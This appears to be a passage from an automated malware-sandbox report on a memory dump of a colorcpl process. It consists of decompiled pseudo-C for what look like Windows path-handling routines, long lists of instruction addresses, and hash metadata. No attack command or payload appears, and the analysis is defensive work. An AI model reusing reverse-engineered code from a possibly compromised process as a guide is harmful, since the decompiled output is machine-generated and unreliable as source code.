									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E06E6D130(_t427, _t494, _t511);
				}
			}










































































                                                                                                0x06ee5ba5
                                                                                                0x06ee5baa
                                                                                                0x06ee5baf
                                                                                                0x06ee5bb4
                                                                                                0x06ee5bb6
                                                                                                0x06ee5bbc
                                                                                                0x06ee5bbe
                                                                                                0x06ee5bc4
                                                                                                0x06ee5bcd
                                                                                                0x06ee5bd3
                                                                                                0x06ee5bd6
                                                                                                0x06ee5bdc
                                                                                                0x06ee5be0
                                                                                                0x06ee5be3
                                                                                                0x06ee5beb
                                                                                                0x06ee5bf2
                                                                                                0x06ee5bf8
                                                                                                0x06ee5bfe
                                                                                                0x06ee5c04
                                                                                                0x06ee5c0e
                                                                                                0x06ee5c18
                                                                                                0x06ee5c1f
                                                                                                0x06ee5c25
                                                                                                0x06ee5c2a
                                                                                                0x06ee5c2c
                                                                                                0x06ee5c32
                                                                                                0x06ee5c3a
                                                                                                0x06ee5c3f
                                                                                                0x06ee5c42
                                                                                                0x06ee5c48
                                                                                                0x06ee5c5b
                                                                                                0x06ee5c5b
                                                                                                0x06ee5c2c
                                                                                                0x06ee5cb7
                                                                                                0x06ee5cb9
                                                                                                0x06ee5cbf
                                                                                                0x06ee5cc2
                                                                                                0x06ee5cca
                                                                                                0x06ee5ccb
                                                                                                0x06ee5ccb
                                                                                                0x06ee5cd1
                                                                                                0x06ee5cd7
                                                                                                0x06ee5cda
                                                                                                0x06ee5ce1
                                                                                                0x06ee5ce4
                                                                                                0x06ee5ce7
                                                                                                0x06ee5ced
                                                                                                0x06ee5cf3
                                                                                                0x06ee5cf9
                                                                                                0x06ee5cff
                                                                                                0x06ee5d08
                                                                                                0x06ee5d0a
                                                                                                0x06ee5d0e
                                                                                                0x06ee5d10
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5d16
                                                                                                0x06ee5d1a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5d20
                                                                                                0x06ee5d22
                                                                                                0x06ee5d25
                                                                                                0x06ee5d2f
                                                                                                0x06ee5d2f
                                                                                                0x06ee5d33
                                                                                                0x06ee5d3d
                                                                                                0x06ee5d49
                                                                                                0x06ee5d4b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5d5a
                                                                                                0x06ee5d5d
                                                                                                0x06ee5d60
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5d66
                                                                                                0x06ee5d69
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5d6f
                                                                                                0x06ee5d6f
                                                                                                0x06ee5d73
                                                                                                0x06ee5d79
                                                                                                0x06ee5d7f
                                                                                                0x06ee5d86
                                                                                                0x06ee5d95
                                                                                                0x06ee5d98
                                                                                                0x06ee5dba
                                                                                                0x06ee5dcb
                                                                                                0x06ee5dce
                                                                                                0x06ee5dd3
                                                                                                0x06ee5dd6
                                                                                                0x06ee5dd8
                                                                                                0x06ee5de6
                                                                                                0x06ee5dec
                                                                                                0x06ee5dee
                                                                                                0x06ee5df1
                                                                                                0x06ee5df3
                                                                                                0x06ee635a
                                                                                                0x06ee635a
                                                                                                0x00000000
                                                                                                0x06ee635a
                                                                                                0x06ee5dfe
                                                                                                0x06ee5e02
                                                                                                0x06ee5e05
                                                                                                0x06ee5e07
                                                                                                0x06ee5e10
                                                                                                0x06ee5e13
                                                                                                0x06ee5e1b
                                                                                                0x06ee5e1c
                                                                                                0x06ee5e21
                                                                                                0x06ee5e22
                                                                                                0x06ee5e23
                                                                                                0x06ee5e25
                                                                                                0x06ee5e2a
                                                                                                0x06ee5e2c
                                                                                                0x06ee5e2e
                                                                                                0x06ee5e36
                                                                                                0x06ee5e39
                                                                                                0x06ee5e42
                                                                                                0x06ee5e47
                                                                                                0x06ee5e4d
                                                                                                0x06ee5e54
                                                                                                0x06ee5e54
                                                                                                0x06ee5e54
                                                                                                0x06ee5e2e
                                                                                                0x06ee5e5c
                                                                                                0x06ee5e5f
                                                                                                0x06ee5e62
                                                                                                0x06ee5e64
                                                                                                0x06ee5e6b
                                                                                                0x06ee5e70
                                                                                                0x06ee5e7a
                                                                                                0x06ee5e7a
                                                                                                0x06ee5e7a
                                                                                                0x06ee5e6b
                                                                                                0x06ee5e7e
                                                                                                0x06ee5e7f
                                                                                                0x06ee5e7f
                                                                                                0x06ee5e81
                                                                                                0x06ee5e87
                                                                                                0x06ee5e8b
                                                                                                0x06ee5e8c
                                                                                                0x06ee5e8c
                                                                                                0x06ee5e8c
                                                                                                0x06ee5e9a
                                                                                                0x06ee5e9c
                                                                                                0x06ee5ea2
                                                                                                0x06ee5ea6
                                                                                                0x06ee5f50
                                                                                                0x06ee5f50
                                                                                                0x06ee5f57
                                                                                                0x06ee5f66
                                                                                                0x06ee5f66
                                                                                                0x06ee5f66
                                                                                                0x06ee5f68
                                                                                                0x06ee5f6a
                                                                                                0x06ee63d0
                                                                                                0x00000000
                                                                                                0x06ee5f70
                                                                                                0x06ee5f70
                                                                                                0x06ee5f91
                                                                                                0x06ee5f9c
                                                                                                0x06ee5f9e
                                                                                                0x06ee5fa4
                                                                                                0x06ee5fa6
                                                                                                0x06ee638c
                                                                                                0x06ee6392
                                                                                                0x06ee63a1
                                                                                                0x06ee63a7
                                                                                                0x06ee63af
                                                                                                0x06ee63af
                                                                                                0x06ee63bd
                                                                                                0x06ee63d8
                                                                                                0x00000000
                                                                                                0x06ee63d8
                                                                                                0x06ee5fac
                                                                                                0x06ee5fb2
                                                                                                0x06ee5fb4
                                                                                                0x06ee5fbd
                                                                                                0x06ee5fc6
                                                                                                0x06ee5fce
                                                                                                0x06ee5fd4
                                                                                                0x06ee5fdc
                                                                                                0x06ee5fec
                                                                                                0x06ee5fed
                                                                                                0x06ee5fee
                                                                                                0x06ee5fef
                                                                                                0x06ee5ff9
                                                                                                0x06ee5ffa
                                                                                                0x06ee5ffb
                                                                                                0x06ee5ffc
                                                                                                0x06ee6000
                                                                                                0x06ee6004
                                                                                                0x06ee6012
                                                                                                0x06ee6012
                                                                                                0x06ee6018
                                                                                                0x06ee6019
                                                                                                0x06ee601a
                                                                                                0x06ee601b
                                                                                                0x06ee601c
                                                                                                0x06ee6020
                                                                                                0x06ee6059
                                                                                                0x06ee605c
                                                                                                0x06ee6061
                                                                                                0x06ee6061
                                                                                                0x06ee6022
                                                                                                0x06ee6022
                                                                                                0x06ee6022
                                                                                                0x06ee6025
                                                                                                0x06ee602a
                                                                                                0x06ee602b
                                                                                                0x06ee6031
                                                                                                0x06ee6037
                                                                                                0x06ee6038
                                                                                                0x06ee603e
                                                                                                0x06ee6048
                                                                                                0x06ee6049
                                                                                                0x06ee604a
                                                                                                0x06ee604b
                                                                                                0x06ee604c
                                                                                                0x06ee604d
                                                                                                0x06ee6053
                                                                                                0x06ee6054
                                                                                                0x06ee6054
                                                                                                0x06ee6062
                                                                                                0x06ee6065
                                                                                                0x06ee6067
                                                                                                0x06ee606a
                                                                                                0x06ee6070
                                                                                                0x06ee6075
                                                                                                0x06ee6076
                                                                                                0x06ee6081
                                                                                                0x06ee6087
                                                                                                0x06ee6095
                                                                                                0x06ee6099
                                                                                                0x06ee609e
                                                                                                0x06ee60a4
                                                                                                0x06ee60ae
                                                                                                0x06ee60b0
                                                                                                0x06ee60b3
                                                                                                0x06ee60b6
                                                                                                0x06ee60b8
                                                                                                0x06ee60ba
                                                                                                0x06ee60ba
                                                                                                0x06ee60ba
                                                                                                0x06ee60ba
                                                                                                0x06ee60be
                                                                                                0x06ee60c0
                                                                                                0x06ee60c5
                                                                                                0x06ee60c5
                                                                                                0x06ee60c5
                                                                                                0x06ee60c6
                                                                                                0x06ee60cd
                                                                                                0x06ee6114
                                                                                                0x06ee60cf
                                                                                                0x06ee60cf
                                                                                                0x06ee60d4
                                                                                                0x06ee60d5
                                                                                                0x06ee60da
                                                                                                0x06ee60db
                                                                                                0x06ee60e1
                                                                                                0x06ee60e2
                                                                                                0x06ee60e8
                                                                                                0x06ee60f8
                                                                                                0x06ee60fd
                                                                                                0x06ee60fe
                                                                                                0x06ee6102
                                                                                                0x06ee6104
                                                                                                0x06ee6107
                                                                                                0x06ee6109
                                                                                                0x06ee610b
                                                                                                0x06ee610b
                                                                                                0x06ee610b
                                                                                                0x06ee610b
                                                                                                0x06ee610f
                                                                                                0x06ee610f
                                                                                                0x06ee6117
                                                                                                0x06ee611a
                                                                                                0x06ee611f
                                                                                                0x06ee6125
                                                                                                0x06ee6134
                                                                                                0x06ee6139
                                                                                                0x06ee613f
                                                                                                0x06ee6146
                                                                                                0x06ee6148
                                                                                                0x06ee614b
                                                                                                0x06ee614d
                                                                                                0x06ee614f
                                                                                                0x06ee614f
                                                                                                0x06ee614f
                                                                                                0x06ee614f
                                                                                                0x06ee6153
                                                                                                0x06ee6159
                                                                                                0x06ee6159
                                                                                                0x06ee615c
                                                                                                0x06ee6163
                                                                                                0x06ee6169
                                                                                                0x06ee616c
                                                                                                0x06ee6172
                                                                                                0x06ee6181
                                                                                                0x06ee6186
                                                                                                0x06ee6187
                                                                                                0x06ee618b
                                                                                                0x06ee6191
                                                                                                0x06ee6195
                                                                                                0x06ee61a3
                                                                                                0x06ee61bb
                                                                                                0x06ee61c0
                                                                                                0x06ee61c3
                                                                                                0x06ee61cc
                                                                                                0x06ee61d0
                                                                                                0x06ee61dc
                                                                                                0x06ee61de
                                                                                                0x06ee61e1
                                                                                                0x06ee61e4
                                                                                                0x06ee61e6
                                                                                                0x06ee61e8
                                                                                                0x06ee61e8
                                                                                                0x06ee61e8
                                                                                                0x06ee61e8
                                                                                                0x06ee61e6
                                                                                                0x06ee61ec
                                                                                                0x06ee61f3
                                                                                                0x06ee6203
                                                                                                0x06ee6209
                                                                                                0x06ee620a
                                                                                                0x06ee6216
                                                                                                0x06ee621d
                                                                                                0x06ee6227
                                                                                                0x06ee6241
                                                                                                0x06ee6246
                                                                                                0x06ee624c
                                                                                                0x06ee6257
                                                                                                0x06ee6259
                                                                                                0x06ee625c
                                                                                                0x06ee625e
                                                                                                0x06ee6260
                                                                                                0x06ee6260
                                                                                                0x06ee6260
                                                                                                0x06ee6260
                                                                                                0x06ee625e
                                                                                                0x06ee6264
                                                                                                0x06ee6267
                                                                                                0x06ee6269
                                                                                                0x06ee6315
                                                                                                0x06ee6315
                                                                                                0x06ee631b
                                                                                                0x06ee631e
                                                                                                0x06ee6324
                                                                                                0x06ee6327
                                                                                                0x06ee632f
                                                                                                0x06ee6330
                                                                                                0x06ee6333
                                                                                                0x06ee633a
                                                                                                0x06ee633c
                                                                                                0x06ee6335
                                                                                                0x06ee6335
                                                                                                0x06ee6335
                                                                                                0x06ee633f
                                                                                                0x06ee6342
                                                                                                0x06ee634c
                                                                                                0x06ee6352
                                                                                                0x06ee6355
                                                                                                0x06ee6355
                                                                                                0x06ee6359
                                                                                                0x00000000
                                                                                                0x06ee626f
                                                                                                0x06ee6275
                                                                                                0x06ee6275
                                                                                                0x06ee6278
                                                                                                0x06ee627e
                                                                                                0x06ee627e
                                                                                                0x06ee6281
                                                                                                0x06ee6287
                                                                                                0x06ee628d
                                                                                                0x06ee6298
                                                                                                0x06ee629c
                                                                                                0x06ee62a2
                                                                                                0x06ee629e
                                                                                                0x06ee629e
                                                                                                0x06ee629e
                                                                                                0x06ee62a7
                                                                                                0x06ee62a7
                                                                                                0x06ee62aa
                                                                                                0x06ee62b0
                                                                                                0x06ee62f0
                                                                                                0x06ee62f0
                                                                                                0x06ee62f2
                                                                                                0x06ee62f8
                                                                                                0x06ee62fd
                                                                                                0x06ee62b2
                                                                                                0x06ee62b2
                                                                                                0x06ee62b2
                                                                                                0x06ee62b5
                                                                                                0x06ee62dd
                                                                                                0x06ee62e2
                                                                                                0x06ee62e5
                                                                                                0x06ee62b7
                                                                                                0x06ee62b8
                                                                                                0x06ee62bb
                                                                                                0x06ee62bd
                                                                                                0x06ee62c0
                                                                                                0x06ee62c4
                                                                                                0x06ee62cd
                                                                                                0x06ee62cd
                                                                                                0x06ee62c0
                                                                                                0x06ee62bb
                                                                                                0x06ee62b5
                                                                                                0x06ee6302
                                                                                                0x06ee6303
                                                                                                0x06ee6305
                                                                                                0x06ee6305
                                                                                                0x06ee6305
                                                                                                0x06ee630c
                                                                                                0x06ee630c
                                                                                                0x00000000
                                                                                                0x06ee627e
                                                                                                0x06ee6269
                                                                                                0x06ee5eac
                                                                                                0x06ee5ebb
                                                                                                0x06ee5ebe
                                                                                                0x06ee5ecb
                                                                                                0x06ee5ecb
                                                                                                0x06ee5ece
                                                                                                0x06ee5ece
                                                                                                0x06ee5ed4
                                                                                                0x06ee5ed7
                                                                                                0x06ee5ed9
                                                                                                0x06ee5edb
                                                                                                0x06ee5edb
                                                                                                0x06ee5ee1
                                                                                                0x06ee5ee1
                                                                                                0x06ee5ee3
                                                                                                0x06ee5f20
                                                                                                0x06ee5f20
                                                                                                0x06ee5ee5
                                                                                                0x06ee5ee5
                                                                                                0x06ee5ee5
                                                                                                0x06ee5ee8
                                                                                                0x06ee5f11
                                                                                                0x06ee5f18
                                                                                                0x06ee5eea
                                                                                                0x06ee5eea
                                                                                                0x06ee5eed
                                                                                                0x06ee5ef2
                                                                                                0x06ee5ef8
                                                                                                0x06ee5efb
                                                                                                0x06ee5f0a
                                                                                                0x06ee5f0a
                                                                                                0x06ee5eed
                                                                                                0x06ee5ee8
                                                                                                0x06ee5f22
                                                                                                0x06ee5f28
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5f30
                                                                                                0x06ee5f31
                                                                                                0x06ee5f37
                                                                                                0x06ee5f3a
                                                                                                0x06ee5f3d
                                                                                                0x06ee5f44
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5f46
                                                                                                0x06ee5f48
                                                                                                0x06ee5f4d
                                                                                                0x00000000
                                                                                                0x06ee5f4d
                                                                                                0x06ee5dda
                                                                                                0x06ee5ddf
                                                                                                0x00000000
                                                                                                0x06ee5ddf
                                                                                                0x06ee5dd8
                                                                                                0x06ee5da7
                                                                                                0x06ee5da9
                                                                                                0x06ee5dac
                                                                                                0x06ee5dae
                                                                                                0x00000000
                                                                                                0x06ee5db4
                                                                                                0x06ee5db4
                                                                                                0x00000000
                                                                                                0x06ee5db4
                                                                                                0x06ee5dae
                                                                                                0x06ee5d88
                                                                                                0x06ee5d8d
                                                                                                0x06ee6363
                                                                                                0x06ee6369
                                                                                                0x06ee636a
                                                                                                0x06ee6370
                                                                                                0x06ee6372
                                                                                                0x06ee637a
                                                                                                0x06ee637b
                                                                                                0x06ee637d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee637f
                                                                                                0x06ee6385
                                                                                                0x00000000
                                                                                                0x06ee6385
                                                                                                0x06ee5d38
                                                                                                0x06ee5d3b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5d3b
                                                                                                0x06ee5d27
                                                                                                0x06ee5d29
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee6360
                                                                                                0x00000000
                                                                                                0x06ee6360
                                                                                                0x06ee5c10
                                                                                                0x06ee5c10
                                                                                                0x06ee63da
                                                                                                0x06ee63e5
                                                                                                0x06ee63e5

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7aee96b153b1524b66d13a23880a870669a96847305323da193a8c0faaa3620b
                                                                                                • Instruction ID: a1ac8c3a027e070a7ae34fe63a2923666bb79b6d4698a3a202368fa0604ff9ad
                                                                                                • Opcode Fuzzy Hash: 7aee96b153b1524b66d13a23880a870669a96847305323da193a8c0faaa3620b
                                                                                                • Instruction Fuzzy Hash: 40426A75D00329CFDBA0CF68C880BA9B7B1FF59308F1491AAD95DAB242E7359985CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E34120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E06E34120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x6f0d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E06E4F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E06E36E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L06E34620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E06E36E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M06E345F8))) {
												case 0:
													_v568 = 0x6df1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x6df11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L06E34620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E06E5F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E06E5F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E06E152A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E06E2EB70(1, 0x6f079a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E06E2AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E06E595D0();
																			L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E06E5B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E06E53D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E06E5B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                0x06e34128
                                                                                                0x06e34135
                                                                                                0x06e3413c
                                                                                                0x06e34141
                                                                                                0x06e34145
                                                                                                0x06e34147
                                                                                                0x06e3414e
                                                                                                0x06e34151
                                                                                                0x06e34159
                                                                                                0x06e3415c
                                                                                                0x06e34160
                                                                                                0x06e34164
                                                                                                0x06e34168
                                                                                                0x06e3416c
                                                                                                0x06e3417f
                                                                                                0x06e34181
                                                                                                0x06e3446a
                                                                                                0x06e3446a
                                                                                                0x06e3418c
                                                                                                0x06e34195
                                                                                                0x06e34199
                                                                                                0x06e34432
                                                                                                0x06e34439
                                                                                                0x06e3443d
                                                                                                0x06e34442
                                                                                                0x06e34447
                                                                                                0x00000000
                                                                                                0x06e3419f
                                                                                                0x06e341a3
                                                                                                0x06e341b1
                                                                                                0x06e341b9
                                                                                                0x06e341bd
                                                                                                0x06e345db
                                                                                                0x06e345db
                                                                                                0x00000000
                                                                                                0x06e341c3
                                                                                                0x06e341c3
                                                                                                0x06e341ce
                                                                                                0x06e341d4
                                                                                                0x06e7e138
                                                                                                0x06e7e13e
                                                                                                0x06e7e169
                                                                                                0x06e7e16d
                                                                                                0x06e7e19e
                                                                                                0x06e7e16f
                                                                                                0x06e7e16f
                                                                                                0x06e7e175
                                                                                                0x06e7e179
                                                                                                0x06e7e18f
                                                                                                0x06e7e193
                                                                                                0x00000000
                                                                                                0x06e7e199
                                                                                                0x00000000
                                                                                                0x06e7e199
